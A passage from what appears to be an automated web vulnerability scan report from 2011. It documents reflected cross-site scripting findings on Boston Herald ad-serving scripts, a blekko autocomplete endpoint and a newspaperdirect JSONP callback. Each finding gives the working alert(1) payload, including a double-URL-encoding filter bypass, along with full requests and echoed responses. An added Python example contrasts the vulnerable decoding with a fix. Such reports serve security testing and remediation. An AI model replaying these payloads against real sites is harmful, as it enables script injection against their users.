Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2022
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home4cfbf';alert(1)//04fb34becb4@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...
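
Added example, not from the report or from the site: the filter-then-decode-again sequence that finding 4.79 exploits, simulated in Python with the exact query value above, next to a version that decodes once, validates the canonical value against an allowlist and re-encodes it for the URL it is embedded in. The blacklist and the template string are assumptions about the application's code, which the page does not show; a JavaScript-string escaper is included for the cases where a value must be echoed inside a script literal.

```python
"""Added example, not part of the scan report: the double-URL-decoding bypass
seen in finding 4.79, and a decode-once, validate-then-encode fix."""
import re
from urllib.parse import quote, unquote

# The page value exactly as sent on the wire in finding 4.79.
RAW_PAGE = ("bh.heraldinteractive.com/news/home"
            "4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4")
AD_URL = "http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/"
BLOCKED = set("'\"<>")


def passes_blacklist(value: str) -> bool:
    """A character blacklist of the kind the application appears to apply.
    This is an assumption about its behaviour, not the actual server code."""
    return not (set(value) & BLOCKED)


def vulnerable_render(raw_query_value: str) -> str:
    """Web server decodes once, the blacklist runs, then the application
    decodes a second time and builds the JavaScript string literal."""
    once = unquote(raw_query_value)          # %2527 -> %27: still no quote
    if not passes_blacklist(once):
        raise ValueError("blocked")
    twice = unquote(once)                    # %27 -> ' : the bypass
    return "'SRC=\"" + AD_URL + twice + "@Top!Top\">'"


# Allowlist for a value that is only ever a host/section/page path.
PAGE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")


def fixed_render(raw_query_value: str) -> str:
    """Decode exactly once, validate the canonical value against an
    allowlist, then percent-encode it for the URL it is embedded in.
    Nothing that survives quote() can end a JS string or an attribute."""
    page = unquote(raw_query_value)
    if not PAGE_RE.fullmatch(page):
        raise ValueError("page must look like host/section/page")
    return "'SRC=\"" + AD_URL + quote(page, safe="/") + "@Top!Top\">'"


def is_rejected(raw_query_value: str) -> bool:
    """True when fixed_render() refuses the value."""
    try:
        fixed_render(raw_query_value)
    except ValueError:
        return True
    return False


def js_string_escape(value: str) -> str:
    """Escape for a JavaScript string literal when a value must be echoed
    inside one: every non-alphanumeric character becomes \\xNN or \\uNNNN,
    so neither quote kind, ; nor </script> survives."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)
```

vulnerable_render(RAW_PAGE) passes the blacklist and still produces the 4cfbf';alert(1)// fragment seen in the response, while fixed_render(RAW_PAGE) refuses the once-decoded value because it contains %. The JavaScript-string escaper handles only that one layer: the string here is later written out as an IFRAME attribute, so the value also needs HTML attribute encoding (or, as above, URL encoding that leaves no metacharacters) for that layer.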

4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e2b"><script>alert(1)</script>d1318e1e89 was submitted in the page parameter. This input was echoed as 97e2b\"><script>alert(1)</script>d1318e1e89 in the application's response. As in 4.78, the backslash before the quote is not an HTML escape, so the SRC attribute is still terminated; this exact payload, however, lands in the ignored body of the SRC-bearing SCRIPT element and must first close it with "></script> before an injected script element will run.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home97e2b"><script>alert(1)</script>d1318e1e89 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:43 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2112
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home97e2b\"><script>alert(1)</script>d1318e1e89@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cb2a</script><script>alert(1)</script>60f4c826daf was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top2cb2a</script><script>alert(1)</script>60f4c826daf&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2149
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
ING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top2cb2a</script><script>alert(1)</script>60f4c826daf">
...[SNIP]...

4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a42"><script>alert(1)</script>f1bf5dd16e2 was submitted in the position parameter. This input was echoed as 29a42\"><script>alert(1)</script>f1bf5dd16e2 in the application's response. As in 4.78, the backslash before the quote is not an HTML escape, so the SRC attribute is still terminated; this exact payload, however, lands in the ignored body of the SRC-bearing SCRIPT element and must first close it with "></script> before an injected script element will run.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top29a42"><script>alert(1)</script>f1bf5dd16e2&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2113
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top29a42\"><script>alert(1)</script>f1bf5dd16e2">
...[SNIP]...

4.83. http://blekko.com/autocomplete [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied unmodified into the JSON body of the response. The payload a4d93<script>alert(1)</script>c705977927c was submitted in the query parameter. This input was echoed unmodified in the application's response.

Caveat: the response is served as text/plain with a UTF-8 charset and is consumed by the page through XMLHttpRequest, so a browser that honours the declared Content-Type will not render the echoed tags as HTML when the URL is opened directly; exploitation depends on the client sniffing the body as HTML. The response carries no X-Content-Type-Options: nosniff header, and the value should in any case be JSON-escaped (\u003c for <) before it is emitted.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=raa4d93<script>alert(1)</script>c705977927c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Sat, 17 Sep 2011 07:44:24 GMT
Vary: Accept-Encoding
Content-Length: 72
X-Blekko-PT: 93cfc820c49a41f46623c49ee1de1a1a

{"suggestions":[],"query":"raa4d93<script>alert(1)</script>c705977927c"}

4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8eb5"><script>alert(1)</script>ac50390d5f8 was submitted in the companion parameter. This input was echoed as b8eb5\"><script>alert(1)</script>ac50390d5f8 in the application's response. As in 4.78, the backslash before the quote is not an HTML escape, so the SRC attribute is still terminated; this exact payload, however, lands in the ignored body of the SRC-bearing SCRIPT element and must first close it with "></script> before an injected script element will run.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottomb8eb5"><script>alert(1)</script>ac50390d5f8&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottomb8eb5\"><script>alert(1)</script>ac50390d5f8!Top">
...[SNIP]...

4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 492df</script><script>alert(1)</script>3d2d1682c3d was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2118
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
R=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d!Top">
...[SNIP]...

4.86. http://bostonherald.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1c0"><script>alert(1)</script>6c55ca82c3b was submitted in the page parameter. This input was echoed as 6c1c0\"><script>alert(1)</script>6c55ca82c3b in the application's response. As in 4.78, the backslash before the quote is not an HTML escape, so the SRC attribute is still terminated; this exact payload, however, lands in the ignored body of the SRC-bearing SCRIPT element and must first close it with "></script> before an injected script element will run.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle6c1c0"><script>alert(1)</script>6c55ca82c3b HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article6c1c0\"><script>alert(1)</script>6c55ca82c3b@Top,Right,Middle,Bottom!Top">
...[SNIP]...

4.87. http://bostonherald.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 was submitted in the page parameter. This input was echoed as 8bca3';alert(1)//54aa045dd55 in the application's response. As in 4.79, the quote closes the literal and // discards the rest of the line; whether this exact payload runs depends on the truncated statement remaining syntactically valid, which the snipped response does not show.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1986
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article8bca3';alert(1)//54aa045dd55@Top,Right,Middle,Bottom!Top">
...[SNIP]...

4.88. http://bostonherald.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9a4"><script>alert(1)</script>5a6cecf4080 was submitted in the position parameter. This input was echoed as 4d9a4\"><script>alert(1)</script>5a6cecf4080 in the application's response. As in 4.78, the backslash before the quote is not an HTML escape, so the SRC attribute is still terminated; this exact payload, however, lands in the ignored body of the SRC-bearing SCRIPT element and must first close it with "></script> before an injected script element will run.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top4d9a4"><script>alert(1)</script>5a6cecf4080&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2077
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top4d9a4\"><script>alert(1)</script>5a6cecf4080">
...[SNIP]...

4.89. http://bostonherald.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ffc</script><script>alert(1)</script>2d13a9c6857 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top95ffc</script><script>alert(1)</script>2d13a9c6857&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2113
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top95ffc</script><script>alert(1)</script>2d13a9c6857">
...[SNIP]...

4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The value of the callback request parameter is copied unmodified into a JSONP response served as application/x-javascript, where it forms the name of the function that wraps the JSON data. The payload 7b357<script>alert(1)</script>dcde2ff62ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.

Caveat: because the declared type is JavaScript rather than HTML, a browser that honours it will not render the injected tags when the URL is opened directly, and the response carries no X-Content-Type-Options: nosniff header to prevent older clients from sniffing it. Independently of that, the unrestricted callback name is an injection point into JavaScript (see 4.91) and should be limited to a dotted identifier.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=toppictures&datepos=7&language=en&count=20&personalization=0&format=json&callback=HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac&swf=true HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 17 Sep 2011 01:54:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:44:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 1
Date: Sat, 17 Sep 2011 01:44:37 GMT
Content-Length: 5965

